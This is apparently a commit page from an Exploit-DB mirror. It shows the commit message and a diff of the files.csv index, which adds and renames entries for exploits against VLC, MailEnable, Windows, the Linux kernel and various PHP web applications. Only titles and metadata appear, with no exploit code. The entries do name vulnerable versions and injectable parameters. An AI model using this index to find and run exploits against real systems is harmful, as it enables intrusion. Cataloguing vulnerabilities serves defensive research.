bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-16

Browse source 
8 new exploits

MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service
MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service

MailEnable Professional/Enterprise 2.37 - Denial of Service
MailEnable Professional/Enterprise 2.37 - Denial Of Service

Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service
Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service

MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service

VideoLAN VLC Media Player - Subtitle StripTags() Function Memory Corruption
VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption

VideoLAN VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser
VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser

VideoLAN VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service
VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service

VideoLAN VLC Media Player - '.wav' File Memory Corruption
VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption
Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free
Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference
Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)

VideoLAN VLC Media Player - '.TY' File Stack Based Buffer Overflow
VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow

VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking
VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking

VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)

VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)
VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)

VideoLAN VLC Media Player - RealText Subtitle Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)
Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)
Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)

Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)

MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow

Versant Object Database 7.0.1.3 - Commands Execution Exploit
Versant Object Database 7.0.1.3 - Commands Execution

VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit
VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit
MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow
MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow
MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow

VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)
VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)

VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)

VideoLAN VLC Media Player - Mms Stream Handling Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)

Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)

Disk Pulse Enterprise 9.0.34 - Buffer Overflow
Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow

Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)
Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)

WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)

phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion
phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
QuickTalk forum 1.3 - 'lang' Local File Inclusion
QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion
QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion
QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion
Mambo Component com_Musica - 'id' SQL Injection
phpArcadeScript 3.0RC2 - (userid) SQL Injection
phpComasy 0.8 - (mod_project_id) SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' SQL Injection
Mambo Component com_Musica - 'id' Parameter SQL Injection
phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection
phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection
XOOPS Module Glossario 2.2 - 'sid' SQL Injection
XOOPS Module wfdownloads - 'cid' SQL Injection
XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection
XOOPS Module wfdownloads - 'cid' Parameter SQL Injection
Joomla! Component Candle 1.0 - (cID) SQL Injection
QuickTicket 1.5 - (qti_usr.php id) SQL Injection
Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection
QuickTicket 1.5 - 'qti_usr.php' SQL Injection
Mambo Component eWriting 1.2.1 - (cat) SQL Injection
phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection
Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution
Mapbender 2.4.4 - (gaz) SQL Injection
Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection
phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection
Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution
Mapbender 2.4.4 - 'gaz' Parameter SQL Injection

phpBB Mod FileBase - 'id' SQL Injection
phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection
XOOPS Module Gallery 0.2.2 - (gid) SQL Injection
XOOPS Module My_eGallery 3.04 - (gid) SQL Injection
XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection
XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection

XOOPS Module tutorials - 'printpage.php' SQL Injection
XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection

easygallery 5.0tr - Multiple Vulnerabilities
EasyGallery 5.0tr - Multiple Vulnerabilities

phpArcadeScript 4 - (cat) SQL Injection
phpArcadeScript 4 - 'cat' Parameter SQL Injection

phpComasy 0.9.1 - (entry_id) SQL Injection
phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection

phpArcadeScript 4.0 - (linkout.php id) SQL Injection
phpArcadeScript 4.0 - 'id' Parameter SQL Injection

Myiosoft EasyGallery - 'catid' Blind SQL Injection
EasyGallery - 'catid' Parameter Blind SQL Injection
phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting
phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting
phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting
phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting
phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting

EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting

Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting

Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection
This commit is contained in:
Offensive Security 2016-11-16 05:01:23 +00:00
parent c27aa131c8
commit 2e7215ec08
17 changed files with 2187 additions and 124 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

110
files.csv
View file

@ -500,9 +500,9 @@ id,file,description,date,author,platform,type,port
3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos,0
3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0
3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos,0
3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0
3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service",2007-02-14,mu-b,windows,dos,0
3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0
3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0
3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial Of Service",2007-02-14,mu-b,windows,dos,0
3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
@ -700,11 +700,11 @@ id,file,description,date,author,platform,type,port
5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0
5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0
5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0
5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0
5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service",2008-03-01,0in,linux,dos,0
5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0
5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0
5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0
5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service",2008-03-11,ryujin,windows,dos,0
5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service",2008-03-11,ryujin,windows,dos,0
5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0
5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0
@ -1878,7 +1878,7 @@ id,file,description,date,author,platform,type,port
16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0
16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0
16095,platforms/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0
16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
@ -1965,7 +1965,7 @@ id,file,description,date,author,platform,type,port
17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
@ -4572,7 +4572,7 @@ id,file,description,date,author,platform,type,port
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",windows,dos,0
37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123
37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0
37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service",2012-08-02,Dark-Puzzle,windows,dos,0
37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos,0
37607,platforms/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
@ -4910,7 +4910,7 @@ id,file,description,date,author,platform,type,port
39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit",2016-01-04,"Google Security Research",multiple,dos,0
39165,platforms/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
39169,platforms/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",multiple,dos,0
39177,platforms/multiple/dos/39177.py,"VideoLAN VLC Media Player - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39177,platforms/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39180,platforms/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39181,platforms/windows/dos/39181.py,"Intel Indeo - Video Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39182,platforms/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
@ -5262,6 +5262,9 @@ id,file,description,date,author,platform,type,port
40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5844,7 +5847,7 @@ id,file,description,date,author,platform,type,port
6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)",2008-10-15,"Ruben Santamarta",windows,local,0
6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0
6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0
6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
@ -6453,7 +6456,7 @@ id,file,description,date,author,platform,type,port
14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14751,platforms/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
@ -6633,13 +6636,13 @@ id,file,description,date,author,platform,type,port
16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local,0
16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0
16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
@ -6830,7 +6833,7 @@ id,file,description,date,author,platform,type,port
18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
18548,platforms/windows/local/18548.rb,"VideoLAN VLC Media Player - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18548,platforms/windows/local/18548.rb,"VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local,0
18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
@ -7946,6 +7949,8 @@ id,file,description,date,author,platform,type,port
27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0
27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0
40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
@ -8631,6 +8636,7 @@ id,file,description,date,author,platform,type,port
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9246,7 +9252,7 @@ id,file,description,date,author,platform,type,port
3389,platforms/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0
3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0
3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0
3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143
3397,platforms/windows/remote/3397.pl,"MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143
3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 < 4.4.6 - PHPinfo() Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0
3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote,0
3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote,0
@ -9544,14 +9550,14 @@ id,file,description,date,author,platform,type,port
5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0
5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Buffer Overflow",2008-02-29,Elazar,windows,remote,0
5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0
5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0
5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0
5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0
5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0
5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0
